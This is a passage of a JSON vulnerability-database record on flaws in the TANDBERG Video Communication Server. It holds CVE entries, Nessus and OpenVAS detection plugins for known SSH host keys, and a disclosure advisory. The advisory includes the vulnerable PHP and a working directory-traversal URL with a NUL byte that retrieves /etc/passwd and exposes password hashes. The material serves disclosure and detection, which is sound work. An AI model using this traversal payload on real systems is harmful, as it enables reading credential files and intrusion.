----------------\r\nThanks to TANDBERG for the quick initial response and cooperation.\r\n\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nReferences:\r\n\r\n1. TANDBERG - Video Communication Server\r\n http://www.tandberg.com/video-conferencing-network-infrastructure/video-communication-server.jsp\r\n\r\n2. TANDBERG VCS Firmware Downloads\r\n http://ftp.tandberg.com/pub/software/vcs/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n Copyright 2009,2010 Virtual Security Research, LLC. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niD8DBQFLv/bkQ1RSUNR+T+gRAuThAKCTilCnuTbLWgK1U/ByAPeY9VWQGwCfZsOO\r\n+uOm1DQpX16KuhclPLBcdfg=\r\n=TQ5s\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2010-04-14T00:00:00", "type": "securityvulns", "title": "CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-4511"], "modified": "2010-04-14T00:00:00", "id": "SECURITYVULNS:DOC:23622", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23622", "sourceData": "", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2023-02-09T14:08:27", "description": "The administrative web console on the TANDBERG Video Communication Server (VCS) before X4.3 uses predictable session cookies in (1) tandberg/web/lib/secure.php and (2) tandberg/web/user/lib/secure.php, which makes it easier for remote attackers to bypass authentication, and execute arbitrary code by loading a custom software update, via a crafted \"Cookie: tandberg_login=\" HTTP header.", "cvss3": {}, "published": "2010-04-13T17:30:00", "type": "cve", "title": "CVE-2009-4509", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4509"], "modified": "2018-10-10T19:49:00", "cpe": ["cpe:/a:vsecurity:tandberg_video_communication_server:x3.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.1", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x3.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.0.0"], "id": "CVE-2009-4509", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4509", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:08:28", "description": "The SSH service on the TANDBERG Video Communication Server (VCS) before X5.1 uses a fixed DSA key, which makes it easier for remote attackers to conduct man-in-the-middle attacks and spoof arbitrary servers via crafted SSH packets.", "cvss3": {}, "published": "2010-04-13T17:30:00", "type": "cve", "title": "CVE-2009-4510", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4510"], "modified": "2018-08-13T21:47:00", "cpe": ["cpe:/a:vsecurity:tandberg_video_communication_server:x3.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.1", "cpe:/a:vsecurity:tandberg_video_communication_server:x5.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.3.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x3.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.0.0"], "id": "CVE-2009-4510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4510", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:08:28", "description": "Multiple directory traversal vulnerabilities in the web administration interface on the TANDBERG Video Communication Server (VCS) before X5.1 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the page parameter to (1) helppage.php or (2) user/helppage.php.", "cvss3": {}, "published": "2010-04-13T17:30:00", "type": "cve", "title": "CVE-2009-4511", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4511"], "modified": "2018-10-10T19:49:00", "cpe": ["cpe:/a:vsecurity:tandberg_video_communication_server:x3.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.1", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.3.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x3.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.0.0"], "id": "CVE-2009-4511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4511", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.0:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2023-01-11T15:07:34", "description": "The remote device appears to be a TANDBERG Video Communication Server (VCS), an appliance supporting interoperation of video conferencing and unified communications devices. \n\nThe fingerprint for the SSH service running on this device matches that of the host key distributed with some versions of the VCS firmware. \n\nKnowing this, a remote attacker may be able to impersonate or conduct man-in-the-middle attacks and gain shell access to the affected device.", "cvss3": {}, "published": "2010-04-14T00:00:00", "type": "nessus", "title": "TANDBERG Video Communication Server Static SSH Host Keys", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4510"], "modified": "2018-11-15T00:00:00", "cpe": [], "id": "TANDBERG_VCS_SSH_KEY.NASL", "href": "https://www.tenable.com/plugins/nessus/45545", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(45545);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2009-4510\");\n script_bugtraq_id(39389);\n\n script_name(english:\"TANDBERG Video Communication Server Static SSH Host Keys\");\n script_summary(english:\"Checks SSH fingerprint\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SSH service uses a static host key.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote device appears to be a TANDBERG Video Communication Server\n(VCS), an appliance supporting interoperation of video conferencing\nand unified communications devices. \n\nThe fingerprint for the SSH service running on this device matches\nthat of the host key distributed with some versions of the VCS\nfirmware. \n\nKnowing this, a remote attacker may be able to impersonate or conduct\nman-in-the-middle attacks and gain shell access to the affected\ndevice.\"\n );\n script_set_attribute(attribute:\"see_also\", \n value:\"http://www.vsecurity.com/resources/advisory/20100409-2/\"\n );\n script_set_attribute(attribute:\"see_also\", \n value:\"https://www.securityfocus.com/archive/1/510654\"\n );\n script_set_attribute(attribute:\"solution\", \n value:\n\"Generate a new SSH host key and use it in place of the current one. \nThen upgrade to VCS firmware version 5.1.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/14\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"ssh_detect.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nport = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) exit(0, \"Port \"+port+\" is not open.\");\n\n\nfingerprint = get_kb_item(\"SSH/Fingerprint/ssh-dss/\"+port);\nif (!fingerprint) exit(0, \"There is no DSA host key associated with the SSH service on port \"+port+\".\");\n\n\nknown_fingerprint = \"4953bf942ad70c3f4829f75b5dde89b8\";\nif (tolower(fingerprint) == known_fingerprint)\n{\n if (report_verbosity > 0)\n {\n fingerprint = ereg_replace(pattern:\"(..)\", replace:\"\\1:\", string:fingerprint);\n fingerprint = substr(fingerprint, 0, strlen(fingerprint)-2);\n\n report = \n '\\nThe DSA host key used by this service has been fingerprinted as :\\n' +\n '\\n' +\n ' ' + fingerprint + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0); \n}\nelse exit(0, \"The DSA host key associated with the SSH service on port \"+port+\" does not match the default used by VCS.\");\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "description": "", "cvss3": {}, "published": "2010-04-12T00:00:00", "type": "packetstorm", "title": "Tandberg VCS Arbitrary File Retrieval", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4511"], "modified": "2010-04-12T00:00:00", "id": "PACKETSTORM:88240", "href": "https://packetstormsecurity.com/files/88240/Tandberg-VCS-Arbitrary-File-Retrieval.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n \n \nVirtual Security Research, LLC. \nhttp://www.vsecurity.com/ \nSecurity Advisory \n \n \n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \n \nAdvisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval \nRelease Date: 2010-04-09 \nApplication: Video Communication Server (VCS) \nVersions: x4.3.0, x4.2.1, and possibly earlier \nSeverity: Medium \nDiscovered by: Jon Hart \nAdvisory by: Timothy D. Morgan <tmorgan (a) vsecurity . com> \nVendor Status: Firmware update released [2] \nCVE Candidate: CVE-2009-4511 \nReference: http://www.vsecurity.com/resources/advisory/20100409-3/ \n \n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \n \n \nProduct Description \n- ------------------- \n- From [1]: \n \n\"The Video Communication Server (VCS) is an integral part of the TANDBERG \nTotal Solution and is the center of the video communications network, \nconnecting the benefits of video conferencing and telepresence to other \ncommunications environments including unified communications and IP Telephony \nnetworks.\" \n \n \nVulnerability Overview \n- ---------------------- \nOn December 3rd, VSR identified a directory traversal and file retrieval \nvulnerability in the TANDBERG's Video Communication Server. This issue would \nallow an authenticated attacker (who has access as an administrator or less \nprivileged user on the web administration interface) to retrieve files from the \nfilesystem which are readable by the \"nobody\" system user. \n \n \nProduct Background \n- ------------------ \nThe TANDBERG Video Communication Server is a Linux-based appliance which \nsupports the interoperation of a plethora of video and voice communications \ndevices. The VCS provides a web-based management interface implemented in PHP \nwhich allows administrators to perform a wide variety of actions, including \nconfiguration of the device, management of user accounts, firmware updates, \nalong with number of other items. \n \n \nVulnerability Details \n- --------------------- \nThe TANDBERG VCS web management interface provides two nearly identical scripts \nat URLs: \nhttps://vulnerable.example.com/helppage.php \nhttps://vulnerable.example.com/user/helppage.php \n \nThese help pages accept a \"file\" parameter in the URL which can be used to \nretrieve nearly arbitrary files from the filesystem. The relevant source code \nfor these pages is as follows: \n \n// The following is Copyright (C) 2009 TANDBERG // \n... \n// Grab the content before we write anything: we'll need it for the title tag in the <head> \n// Dig out the page title, from the <title> tag, \n// then remove any surround in the page as we add our own... \n$filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix; \n \nif (! file_exists($filename)) { \n$helpHTML = \"There is no help available for the \". $_GET['page'] . \" page<br/>\"; \n$pageTitle = $_GET['page']; \n}else{ \n$helpHTML = file_get_contents($filename); \n \n... \n \necho \"\\n<!-- ********** -->\\n\"; \necho $helpHTML; \necho \"<!-- ********** -->\\n\"; \n... \n// end of excerpt // \n \n \nHere, the final path string ($filename) loaded and displayed to the user is \nprepended with a directory and appended with a file extension. Using simple \ndirectory traversal techniques (\"../\") it is possible to traverse to any \ndirectory on the filesystem. Using a trailing NUL byte encoded in the URL (%00) \nit is also possible to truncate the file path to eliminate the file extension. \n \nFor instance, the following URL retrieves the /etc/passwd file: \n \nhttps://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00 \n \n \nDuring testing, it was found that the x4.2.1 firmware runs the web server as the \n\"nobody\" user, which somewhat limits the amount of sensitive information that \nmay be obtained. However, since shadowed passwords were not configured, it was \npossible to retrieve all local system users' password hashes from /etc/passwd. \nAdditional password hashes are available in /tandberg/persistent/etc/digest. \n \n \nVersions Affected \n- ----------------- \nVSR has successfully exploited this issue in firmware version x4.2.1. Based on \npreliminary source code analysis[2], versions x4.3.0 and x5.0 also appear to be \nvulnerable. Earlier versions have not been tested. \n \n \nVendor Response \n- --------------- \nThe following timeline details TANDBERG's response to the reported issue: \n \n2009-12-09 Preliminary notice to TANDBERG. TANDBERG responded immediately. \n \n2009-12-22 VSR provided TANDBERG a draft advisory. \n \n2009-12-28 TANDBERG provided VSR with a beta version of the x5.0 firmware, \nbut this did not appear to correct the issue (based on PHP code \nanalysis alone). \n \n2010-01-22 TANDBERG provided VSR with a beta version of the x5.1 firmware \nfor testing which appeared to correct the vulnerability. \n \n2010-03-26 TANDBERG provided VSR with a release candidate firmware for \nversion x5.1.1. \n \n2010-04-07 TANDBERG VCS firmware version x5.1.1 released [2]. \n \n2010-04-09 VSR advisory released. \n \n \nRecommendation \n- -------------- \nUpgrade to version x5.1.1 to correct this issue. Temporary mitigation may be \nachieved by disabling access for potentially less trusted, non-adminstrative \nusers. \n \n \nCommon Vulnerabilities and Exposures (CVE) Information \n- ------------------------------------------------------ \nThe Common Vulnerabilities and Exposures (CVE) project has assigned \nthe number CVE-2009-4511 to this issue. This is a candidates for \ninclusion in the CVE list (http://cve.mitre.org), which standardizes \nnames for security problems. \n \n \nAcknowledgements \n- ---------------- \nThanks to TANDBERG for the quick initial response and cooperation. \n \n \n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \n \nReferences: \n \n1. TANDBERG - Video Communication Server \nhttp://www.tandberg.com/video-conferencing-network-infrastructure/video-communication-server.jsp \n \n2. TANDBERG VCS Firmware Downloads \nhttp://ftp.tandberg.com/pub/software/vcs/ \n \n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- \nCopyright 2009,2010 Virtual Security Research, LLC. All rights reserved. \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.10 (GNU/Linux) \n \niD8DBQFLv/bkQ1RSUNR+T+gRAuThAKCTilCnuTbLWgK1U/ByAPeY9VWQGwCfZsOO \n+uOm1DQpX16KuhclPLBcdfg= \n=TQ5s \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/88240/tandberg-fileretrieval.txt"}], "openvas": [{"lastseen": "2020-05-08T11:00:20", "description": "The remote host uses a default SSH host key that is shared among\n multiple installations.", "cvss3": {}, "published": "2016-01-05T00:00:00", "type": "openvas", "title": "Known SSH Host Key", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7256", "CVE-2008-0166", "CVE-2015-6358", "CVE-2015-8260", "CVE-2015-7276", "CVE-2015-8251", "CVE-2015-7255", "CVE-2009-4510"], "modified": "2020-05-04T00:00:00", "id": "OPENVAS:1361412562310105497", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105497", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Known SSH Host Key\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105497\");\n script_version(\"2020-05-04T13:55:28+0000\");\n script_name(\"Known SSH Host Key\");\n script_cve_id(\"CVE-2015-6358\", \"CVE-2015-7255\", \"CVE-2015-7256\", \"CVE-2015-7276\", \"CVE-2015-8251\",\n \"CVE-2015-8260\", \"CVE-2009-4510\", \"CVE-2008-0166\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-04 13:55:28 +0000 (Mon, 04 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-05 13:21:28 +0100 (Tue, 05 Jan 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"ssh_proto_version.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"SSH/fingerprints/available\");\n\n script_xref(name:\"URL\", value:\"https://blog.shodan.io/duplicate-ssh-keys-everywhere/\");\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/566724\");\n script_xref(name:\"URL\", value:\"http://blogs.intevation.de/thomas/hetzner-duplicate-ed25519-ssh-host-keys/\");\n script_xref(name:\"URL\", value:\"https://www.vsecurity.com/download/advisories/20100409-2.txt\");\n script_xref(name:\"URL\", value:\"https://wiki.debian.org/SSLkeys\");\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2008/dsa-1571\");\n script_xref(name:\"URL\", value:\"https://github.com/g0tmi1k/debian-ssh\");\n\n script_tag(name:\"summary\", value:\"The remote host uses a default SSH host key that is shared among\n multiple installations.\");\n\n script_tag(name:\"impact\", value:\"An attacker could use this situation to compromise or eavesdrop on the SSH\n communication between the client and the server using a man-in-the-middle attack.\");\n\n script_tag(name:\"insight\", value:\"The list of known SSH host keys used by this plugin is a gathered from various\n sources:\n\n - Top 1.000 Duplicate SSH Fingerprints on the Internet collected via the search engine Shodan in 2015.\n The most common fingerprint was found to be shared among 245.000 installations where the least common was\n still present 321 times.\n\n - SSH host keys generated with a vulnerable OpenSSL version on Debian and derivates (CVE-2008-0166).\n\n - Devices of Multiple Vendors (Cisco, ZTE, ZyXEL, OpenStage, OpenScape, TANDBERG) using hardcoded SSH host keys\n (CVE-2015-6358, CVE-2015-7255, CVE-2015-7256, CVE-2015-7276, CVE-2015-8251, CVE-2015-8260, CVE-2009-4510).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the remote host responds with a known SSH host key.\");\n\n script_tag(name:\"solution\", value:\"Generate a new SSH host key.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"bad_ssh_host_keys.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\"); # For make_list_unique()\n\n# bad_ssh_host_keys.inc might have duplicated host keys for easier\n# maintenance so we will make the list here \"unique\" before\nbad_host_keys = make_list_unique( bad_host_keys );\n\nport = ssh_get_port( default:22 );\n\nforeach algo( ssh_host_key_algos ) {\n\n host_key = get_kb_item( \"SSH/\" + port + \"/fingerprint/\" + algo );\n if( ! host_key || ! strlen( host_key ) )\n continue;\n\n if( in_array( search:host_key, array:bad_host_keys, part_match:FALSE ) ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n\n # Those two are workarounds as we can't include such huge lists into NASL/NVTs.\n # The greps will return something like \"dd:f3:cc:a5:94:95:d3:75:45:be:26:be:1b:13:e0:05\"\n # (including the double apostrophe) if a match was found.\n # nb: Make sure to update the path below if moving the includes or this NVT around.\n if( algo == \"ssh-rsa\" ) {\n argv = make_list( \"grep\", host_key, \"../bad_rsa_ssh_host_keys.txt\" );\n res = pread( cmd:\"grep\", argv:argv, cd:FALSE );\n if( res == '\"' + host_key + '\"' ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n }\n\n if( algo == \"ssh-dss\" ) {\n argv = make_list( \"grep\", host_key, \"../bad_dsa_ssh_host_keys.txt\" );\n res = pread( cmd:\"grep\", argv:argv, cd:FALSE );\n if( res == '\"' + host_key + '\"' ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n }\n}\n\nif( bhk_found ) {\n report = 'The following known SSH hosts key(s) were found:\\n' + _report;\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}